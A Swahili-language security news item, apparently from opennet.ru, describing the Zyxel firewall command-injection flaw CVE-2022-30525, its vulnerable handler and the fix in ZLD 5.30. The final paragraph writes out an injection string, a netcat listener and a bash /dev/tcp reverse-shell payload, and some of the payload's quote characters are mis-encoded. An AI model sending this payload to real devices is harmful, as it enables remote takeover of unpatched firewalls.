Athari mbaya (CVE-2022-30525) imetambuliwa katika vifaa vya Zyxel vya mfululizo wa ATP, VPN na USG FLEX, iliyoundwa ili kupanga uendeshaji wa ngome, IDS na VPN katika makampuni ya biashara, ambayo inaruhusu mshambuliaji wa nje kutekeleza kanuni kwenye kifaa bila haki za mtumiaji bila uthibitishaji. Ili kutekeleza shambulizi, mshambulizi lazima aweze kutuma maombi kwa kifaa kwa kutumia itifaki ya HTTP/HTTPS. Zyxel imerekebisha uwezekano wa kuathiriwa katika sasisho la programu dhibiti la ZLD 5.30. Kulingana na huduma ya Shodan, kwa sasa kuna vifaa 16213 ambavyo vinaweza kuathiriwa kwenye mtandao wa kimataifa ambavyo vinakubali maombi kupitia HTTP/HTTPS.
Uendeshaji unafanywa kwa kutuma amri zilizoundwa mahususi kwa kidhibiti cha wavuti /ztp/cgi-bin/handler, kinachoweza kufikiwa bila uthibitishaji. Tatizo linasababishwa na ukosefu wa usafishaji ipasavyo wa vigezo vya ombi wakati wa kutekeleza amri kwenye mfumo kwa kutumia simu ya os.system inayotumika katika maktaba ya lib_wan_settings.py na kutekelezwa wakati wa kuchakata operesheni ya setWanPortSt.
Kwa mfano, mshambuliaji anaweza kupitisha kamba "; ping 192.168.1.210;" ambayo itasababisha utekelezaji wa amri ya "ping 192.168.1.210" kwenye mfumo. Ili kupata ufikiaji wa ganda la amri, unaweza kuendesha "nc -lvnp 1270" kwenye mfumo wako, na kisha uanzishe muunganisho wa nyuma kwa kutuma ombi kwa kifaa na '; bash -c \Β» exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\Β»;'.
Chanzo: opennet.ru